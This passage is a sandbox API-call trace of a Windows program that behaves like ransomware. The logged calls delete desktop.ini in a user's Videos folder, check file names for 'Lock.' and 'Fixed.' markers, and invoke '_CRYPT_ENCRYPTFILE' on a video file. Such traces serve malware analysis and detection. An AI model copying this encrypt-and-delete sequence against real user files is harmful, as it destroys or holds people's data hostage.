lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0258.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0258.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0258.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0258.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0258.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0258.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0258.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x46) returned 0x9787d0 [0258.211] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x22 [0258.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787d0 | out: hHeap=0x970000) returned 1 [0258.211] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini")) returned 0x26 [0258.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87510 [0258.211] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini")) returned 1 [0258.212] FindNextFileW (in: hFindFile=0xa87510, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0258.212] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0258.213] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0258.213] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0258.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0258.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0258.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0258.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0258.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x46) returned 0x9787d0 [0258.214] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x22 [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787d0 | out: hHeap=0x970000) returned 1 [0258.214] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini")) returned 0xffffffff [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0258.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0258.214] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0258.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0258.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0258.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0258.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0258.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hRmi.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rmi.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mi.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0258.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0258.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0258.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0258.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0258.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0258.289] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0258.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0258.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0258.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0258.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12) returned 0x2e69928 [0258.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0258.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hRmi.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rmi.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mi.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0258.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0258.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0258.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0258.290] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0258.291] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0258.291] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0258.291] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0258.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x9787d0 [0258.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0258.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0258.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0258.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.293] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0258.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.293] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0258.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.293] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/hRmi.mkv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8b90430, ftCreationTime.dwHighDateTime=0x1d5e95a, ftLastAccessTime.dwLowDateTime=0x40cbbc30, ftLastAccessTime.dwHighDateTime=0x1d5ef9f, ftLastWriteTime.dwLowDateTime=0x40cbbc30, ftLastWriteTime.dwHighDateTime=0x1d5ef9f, nFileSizeHigh=0x0, nFileSizeLow=0x3279, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="hRmi.mkv", cAlternateFileName="")) returned 0xa87510 [0258.293] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0258.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.294] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0258.294] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0258.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.294] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0258.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0258.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0258.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0258.295] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) 